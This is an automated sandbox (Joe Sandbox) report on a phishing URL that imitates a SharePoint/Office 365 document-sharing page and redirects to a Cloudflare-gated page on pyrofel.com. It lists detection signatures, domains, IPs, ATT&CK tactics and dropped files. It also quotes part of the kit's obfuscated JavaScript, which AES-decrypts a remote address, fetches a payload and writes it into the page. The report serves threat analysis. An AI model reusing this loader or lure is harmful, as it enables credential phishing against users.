Windows Analysis Report
https://magical-variation-300980.framer.app/

Overview

General Information

Sample URL: https://magical-variation-300980.framer.app/
Analysis ID: 1522629
Infos:

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1948,i,12815218099105573422,12125566759229986179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 3048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
Source | Rule | Description | Author | Strings
dropped/chromecache_113 | JoeSecurity_HtmlPhish_70 | Yara detected HtmlPhish_70 | Joe Security |
    No Sigma rule has matched
    No Suricata rule has matched

    Phishing

    Source: Yara match, File source: dropped/chromecache_113, type: DROPPED
    Source: Chrome DOM: 0.2, OCR Text: SharePoint YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW All documents are available in pdf online format Reference SCN-39405-PDF-00356120 Size 12.3 MB. B ExpiryllO/07/2024 O Sign in Office 365 to review Encrypted Document Shared with you Preview Documents Made in Framer
    Source: Chrome DOM: 0.1, OCR Text: SharePoint YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW All documents are available in pdf online format Reference SCN-39405-PDF-00356120 Size 12.3 MB. B ExpiryllO/07/2024 O Sign in Office 365 to review Encrypted Document Shared with you Preview Documents
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html, HTTP Parser: Base64 decoded: {"a":"Apa4puLKc3ZAfSWknRgnR+5I6LZTBnpJE\/netMjqdXU=","c":"2c2ec4bc20de31a964a09e47b15aa78f","b":"b23ef74939f8ff59e9dcbd0a56efced622a6c08359f644833ee18df95ce2a39650ab057b9c448b0e642ca82078f0dff4128509ecc914d28b2361aadd96cb881ef184c169ebf7b86290dd1c8b61390d...
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html, HTTP Parser: async function babushka(oafishness) { <!-- life is a journey; cars are our faithful companions. --> var {a,b,c,d} = json.parse(oafishness); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function zinc() {tacit.hidden = 0;gaiter.hidden = 1; document.write(await babushka(await (await fetch(await babushka(atob(`eyjhijoiqxbhnhb1tetjm1pbzlnxa25sz25skzvjnkxavejucepfxc9uzxrnanfkwfu9iiwiyyi6ijjjmmvjngjjmjbkztmxytk2ngewowu0n2ixnwfhnzhmiiwiyii6imiym2vmnzq5mzlmogzmntllowrjymqwytu2zwzjzwq2mjjhnmmwodm1owy2ndq4mznlzte4zgy5nwnlmmezoty1mgfimdu3yjljndq4yjblnjqyy2e4mja3ogywzgzmndeyoduwowvjyzkxngqyogiymzyxywfkzdk2y2i4odflzje4ngmxnjllymy3yjg2mjkwzgqxyzhinjezotbknjc5njiznjg5oddjnjnkzwy3ywqwyzllmje1mdi5oteznthim2qxmzflzwrmnwy2odriyta3mtc3ytczodmwyzbkyjrlogvmnjeyyjljymywnjcxngnjy2zizjy4otbkmtnkmmq2ognmog...
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html, HTTP Parser: No favicon
    Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49733 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49757 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49760 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49763 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49767 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49769 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49772 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 2.23.209.169:443 -> 192.168.2.17:49781 version: TLS 1.2
    Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown, TCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknown, TCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: global traffic, DNS traffic detected: DNS query: magical-variation-300980.framer.app
    Source: global traffic, DNS traffic detected: DNS query: framerusercontent.com
    Source: global traffic, DNS traffic detected: DNS query: events.framer.com
    Source: global traffic, DNS traffic detected: DNS query: www.google.com
    Source: global traffic, DNS traffic detected: DNS query: pyrofel.com
    Source: global traffic, DNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global traffic, DNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global traffic, DNS traffic detected: DNS query: tekmom.exnet.su
    Source: global traffic, DNS traffic detected: DNS query: code.jquery.com
    Source: classification engine, Classification label: mal56.phis.win@20/28@40/202
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1948,i,12815218099105573422,12125566759229986179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: unknown unknown
    Source: Window Recorder, Window detected: More than 3 window changes detected

    Persistence and Installation Behavior

    Source: https://magical-variation-300980.framer.app/, LLM: Page contains button: 'Preview Documents' Source: '0.0.pages.csv'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
    Resource Development: 1 Scripting; Domains; DNS Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At
    Persistence: 1 Browser Extensions; 1 Scripting; 1 Registry Run Keys / Startup Folder
    Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows)
    Defense Evasion: 1 Masquerading; 1 Process Injection; 1 Deobfuscate/Decode Files or Information
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
    Discovery: System Service Discovery; Application Window Discovery; Query Registry
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
    Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact

    Source | Detection | Scanner | Label | Link
    https://magical-variation-300980.framer.app/ | 0% | Virustotal | | Browse
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    framerusercontent.com | 1% | Virustotal | | Browse
    events.framer.com | 0% | Virustotal | | Browse
    pyrofel.com | 1% | Virustotal | | Browse
    challenges.cloudflare.com | 0% | Virustotal | | Browse
    cdnjs.cloudflare.com | 0% | Virustotal | | Browse
    www.google.com | 0% | Virustotal | | Browse
    tekmom.exnet.su | 1% | Virustotal | | Browse
    code.jquery.com | 1% | Virustotal | | Browse
    No Antivirus matches
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    framerusercontent.com | 108.138.7.13 | true | false | | unknown
    events.framer.com | 3.160.150.29 | true | false | | unknown
    code.jquery.com | 151.101.194.137 | true | false | | unknown
    cdnjs.cloudflare.com | 104.17.24.14 | true | false | | unknown
    pyrofel.com | 185.12.116.220 | true | false | | unknown
    challenges.cloudflare.com | 104.18.94.41 | true | false | | unknown
    www.google.com | 142.250.74.196 | true | false | | unknown
    tekmom.exnet.su | 188.114.97.3 | true | false | | unknown
    magical-variation-300980.framer.app | 35.71.142.77 | true | false | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html | false | | unknown
    https://magical-variation-300980.framer.app/ | true | | unknown
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          108.138.7.13 | framerusercontent.com | United States | | 16509 | AMAZON-02US | false
          104.17.24.14 | cdnjs.cloudflare.com | United States | | 13335 | CLOUDFLARENETUS | false
          18.239.69.73 | unknown | United States | | 16509 | AMAZON-02US | false
          3.160.150.112 | unknown | United States | | 16509 | AMAZON-02US | false
          142.250.186.163 | unknown | United States | | 15169 | GOOGLEUS | false
          172.217.18.14 | unknown | United States | | 15169 | GOOGLEUS | false
          104.18.94.41 | challenges.cloudflare.com | United States | | 13335 | CLOUDFLARENETUS | false
          35.71.142.77 | magical-variation-300980.framer.app | United States | | 237 | MERIT-AS-14US | false
          104.18.95.41 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
          142.251.173.84 | unknown | United States | | 15169 | GOOGLEUS | false
          3.160.150.33 | unknown | United States | | 16509 | AMAZON-02US | false
          151.101.2.137 | unknown | United States | | 54113 | FASTLYUS | false
          239.255.255.250 | unknown | Reserved | | unknown | unknown | false
          142.250.185.174 | unknown | United States | | 15169 | GOOGLEUS | false
          188.114.97.3 | tekmom.exnet.su | European Union | | 13335 | CLOUDFLARENETUS | false
          3.160.150.29 | events.framer.com | United States | | 16509 | AMAZON-02US | false
          185.12.116.220 | pyrofel.com | Portugal | | 33876 | FLESK-ASPT | false
          151.101.194.137 | code.jquery.com | United States | | 54113 | FASTLYUS | false
          142.250.74.196 | www.google.com | United States | | 15169 | GOOGLEUS | false
          IP
          192.168.2.17
          192.168.2.16
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1522629
          Start date and time:2024-09-30 13:53:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Sample URL:https://magical-variation-300980.framer.app/
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal56.phis.win@20/28@40/202
          • Exclude process from analysis (whitelisted): TextInputHost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.251.173.84, 142.250.185.174, 34.104.35.123
          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
          • Not all processes were analyzed, report is missing behavior information
          Input / Output
          URL: https://magical-variation-300980.framer.app/ Model: jbxai
          {
          "brand":["SharePoint"],
          "contains_trigger_text":true,
          "trigger_text":"YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW",
          "prominent_button_name":"Preview Documents",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html Model: jbxai
          {
          "brand":["CLOUDFLARE"],
          "contains_trigger_text":true,
          "trigger_text":"Verifying...",
          "prominent_button_name":"unknown",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):3.9957699315523096
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2679
          Entropy (8bit):4.012178962541126
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2693
          Entropy (8bit):4.023070160230072
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2681
          Entropy (8bit):4.010481919465156
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2681
          Entropy (8bit):3.9980465278486315
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:53:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2683
          Entropy (8bit):4.01188272316662
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47261)
          Category:dropped
          Size (bytes):47262
          Entropy (8bit):5.3974731018213795
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (26554)
          Category:downloaded
          Size (bytes):26603
          Entropy (8bit):4.728450633304761
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/PX9hIOIVM-XXV3XXZQ.mjs
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 65 x 36, 8-bit/color RGB, non-interlaced
          Category:downloaded
          Size (bytes):61
          Entropy (8bit):4.002585360278504
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cb403f20c904268/1727697238523/6A4uLwacmp0uCnc
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47992), with no line terminators
          Category:dropped
          Size (bytes):47992
          Entropy (8bit):5.605846858683577
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65447)
          Category:downloaded
          Size (bytes):89501
          Entropy (8bit):5.289893677458563
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://code.jquery.com/jquery-3.6.0.min.js
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (36412), with CRLF, LF line terminators
          Category:downloaded
          Size (bytes):41230
          Entropy (8bit):5.024933597412232
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://magical-variation-300980.framer.app/
          Preview:<!doctype html>.. . Built with Framer . https://www.framer.com/ -->..<html>..<head>.. <meta charset="utf-8">.. .. .. Start of headStart -->.. .. End of headStart -->.. <meta name="viewport" content="width=1200">.. <meta name="generator" content="Framer 0b8b5e5">.. <title>My Framer Site</title>.. <meta name="description" content="Made with Framer">.. <meta name="framer-search-index" content="https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/searchIndex-aXjCZ_HS3Lrq.json">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-light.v1.png" rel="icon" media="(prefers-color-scheme: light)">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-dark.v1.png" rel="icon" media="(prefers-color-scheme: dark)">.. <link rel="apple-touch-icon" href="https://framerusercontent.com/sites/icons/default-touch-icon.v3.png">.. Open Graph / Facebook -->.. <meta property="og:type" content="web
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (18088)
          Category:dropped
          Size (bytes):18089
          Entropy (8bit):5.178183231621744
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Java source, ASCII text, with very long lines (2926)
          Category:downloaded
          Size (bytes):2977
          Entropy (8bit):5.461526666930152
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/script_main.V57BLPRN.mjs
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):644661
          Entropy (8bit):5.364049568620206
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2826), with CRLF line terminators
          Category:downloaded
          Size (bytes):5947
          Entropy (8bit):5.766918443511268
          Encrypted:false
          Malicious:false
          Reputation:unknown
          URL:https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html
          Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#tacit {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#icicle {width: 130px;margin-top: 179px;}#objective {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#objective>.earn {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#objecti
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):42
          Entropy (8bit):4.136248672727249
          Encrypted:false
          Malicious:false
          Reputation:unknown
          Preview:{"message":"Missing Authentication Token"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1280x733, components 3
          Category:dropped
          Size (bytes):48562
          Entropy (8bit):7.819852063564457
          Encrypted:false
          SSDEEP:
          MD5:0D3AAD3E36C93CFE4CAE9455C00521CE
          SHA1:0CF5A68D0F5436A398A612DB2112536D9CBD7752
          SHA-256:C5214EE509F3CD6A7A508E5AD94FB3C6E4596D1F6146A03E1985F477D454D5C8
          SHA-512:5BDFF8A37BBB71C20D560AEDFB1098DFCB08F20656B00DB259A99A8D9D90692C3869CC20AC1553BC6285F477988530CC253DA4655378097A8E81AA3045037A3F
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):44
          Entropy (8bit):4.896820539042673
          Encrypted:false
          SSDEEP:
          MD5:F5FE0CAB78140E0E5AA29F68CE8C2888
          SHA1:4E02FF9F9E7144B978E8C80EDA3A4CABE5288B0B
          SHA-256:7B2FAEC4335DE81ABBF1EBF794F91A4F2B870B317093448B84082B5F411C741C
          SHA-512:219FF2BEDE0A09541154FD6772534975BE577F70F72D3D856DF28448EABB6BBBF1784164D7D063449B524FC5C7C3899132473535E1713FBAC4E9E935587A3CCE
          Malicious:false
          Reputation:unknown
          Preview://# sourceMappingURL=chunk-42U43NKG.mjs.map.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (402)
          Category:dropped
          Size (bytes):447
          Entropy (8bit):5.2414929500033836
          Encrypted:false
          SSDEEP:
          MD5:30ED32FA3444DF726BB60D89113CF478
          SHA1:B3B0D1A12B85BBE1E4B2AD12FC074B57597BD22A
          SHA-256:A9428E5E5F6C5EDE3339114A8BE6230E2CC39A2190D03F1092AE93BDAF556891
          SHA-512:A5122B79853B41F851B5BCE88442DB9DADFCF9F6EF0232F61EC43CD4C23F955B837C05FEC8077B34C961AB46FFF69BDFF818970787013131E39058EBAEB8F4D6
          Malicious:false
          Reputation:unknown
          Preview:var e=Object.defineProperty;var d=(n,t)=>{for(var o in t)e(n,o,{get:t[o],enumerable:!0})};var f=typeof document<"u"?globalThis.navigator:void 0,r=typeof document<"u"?globalThis.window:void 0,i=typeof document>"u"?{}:void 0;if(typeof document>"u"){let n=Object.prototype.toString;Object.prototype.toString=function(...t){return this===i?"[object global]":n.call(this,...t)}}export{d as a,f as b,r as c};.//# sourceMappingURL=chunk-RIUMFBNJ.mjs.map.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (491), with CRLF line terminators
          Category:dropped
          Size (bytes):6683
          Entropy (8bit):4.728393039920178
          Encrypted:false
          SSDEEP:
          MD5:4AF167C100336A1E6E9F43B4929B6D00
          SHA1:1F65CC3BD7D9FFE966F51A7104BA915A0A331FF1
          SHA-256:F670BCD58A192CF38E0504712EDAD41CE02828C22B8F0CF72DDF48B453CAA80A
          SHA-512:1FB735B2EC02B7A39AA893DDFEF5A55242B97A2129AA99367C346CC3FECEBE34EBFB4F645FA347D5768104CB7EB30FC1D6EDBE145F28AF3223593FFE805427A0
          Malicious:false
          Reputation:unknown
          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Motorcar Enthusiasts - tekmom.exnet.su</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://tekmom.exnet.su/#">.. <i class="fas fa-car"></i> Motorcar Enthusiasts .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-toggler-icon"><
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (10408)
          Category:downloaded
          Size (bytes):10491
          Entropy (8bit):5.580526706766998
          Encrypted:false
          SSDEEP:
          MD5:1AE70768C480F73533FF1CCDCBF94188
          SHA1:EE5137759145D92BC83310009BBC033B3C9D9753
          SHA-256:D167A32BB6C3FD95F4B4A7C1CB445FEDE958E94036ADEAF562B070D46761A48E
          SHA-512:C6689DEC834B0EFD1F66C975278073B72D4152CBE3F3087445A1E155D570DA2FAC3F6755E219DB6F0A89853893605011E8D7611CBF183B99C273D63D8024FFD0
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/dqa62RV-tPrLEha76eKIvRwZbVeC4htPQYBjwJWsq1I.4MC2Q4TL.mjs
          Preview:import{a as b}from"./chunk-ZZFRRP66.mjs";import"./chunk-42U43NKG.mjs";import{$ as S,A as _,D as t,G as X,H as P,K as W,L as z,N as H,O as q,P as Q,X as Y,_ as M,b as T,ca as G,da as J,e as E,ea as $,i as j,j as k,k as O,m as Z,o as r,p as f,r as h,s as B}from"./chunk-6YCP7OQD.mjs";import"./chunk-RIUMFBNJ.mjs";var d;(function(e){e.Default="Default",e.Custom="Custom"})(d||(d={}));var s;(function(e){e.Upload="Upload",e.URL="URL"})(s||(s={}));var ae='meta[name="framer-search-index"]';function ne(){return typeof document>"u"?!0:!!document.querySelector(ae)}function m(e){let{styleOptions:l,hoverOptions:i,iconOptions:o}=e,{backgroundColor:x,color:U,borderRadius:c,padding:v,paddingPerSide:F,paddingTop:A,paddingRight:D,paddingBottom:N,paddingLeft:C,gap:R}=l,p=ne(),a;p&&(e.srcType===s.URL&&(a=e.srcURL),e.srcType===s.Upload&&(a=e.srcFile));let n=F?`${A}px ${D}px ${N}px ${C}px`:`${v}px`,g=()=>{var I,L;if(!o)return;let V={order:o.alignment==="start"?0:2,flexShrink:0};return o.type===d.Custom&&(!((I
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (547)
          Category:downloaded
          Size (bytes):592
          Entropy (8bit):5.15504916515849
          Encrypted:false
          SSDEEP:
          MD5:4401507AF19BC70511505686BA85691B
          SHA1:59B1387FFB6D9063D2CD0E35D9D2BF272458E2F4
          SHA-256:4305F36C3656F4BFD066E5D843FC93354F3F8CB375834D57F16857E8634F1918
          SHA-512:4ADFA3D4986D01E3E2E156412EDC0DCA489BFD2014CC51991DCE94999D551F92B937A1C710B1BE076BBBFB0DB32305ED256C35E7F720B922CD7DA8E5DFF77978
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/chunk-ZZFRRP66.mjs
          Preview:var n=t=>({description:"Made with Framer",title:"My Framer Site"}),a=n;function s(t,e){return{bodyClassName:"framer-body-augiA20Il",breakpoints:[{hash:"72rtr7"}],description:a(t,e).description,elements:{},robots:"max-image-preview:large",serializationId:"framer-dXZeP",title:a(t,e).title||"Home",viewport:"width=1200"}}var l=1,_={exports:{default:{type:"function",annotations:{framerContractVersion:"1"}},metadataVersion:{type:"variable",annotations:{framerContractVersion:"1"}},__FramerMetadata__:{type:"variable"}}};export{s as a,l as b,_ as c};.//# sourceMappingURL=chunk-ZZFRRP66.mjs.map.
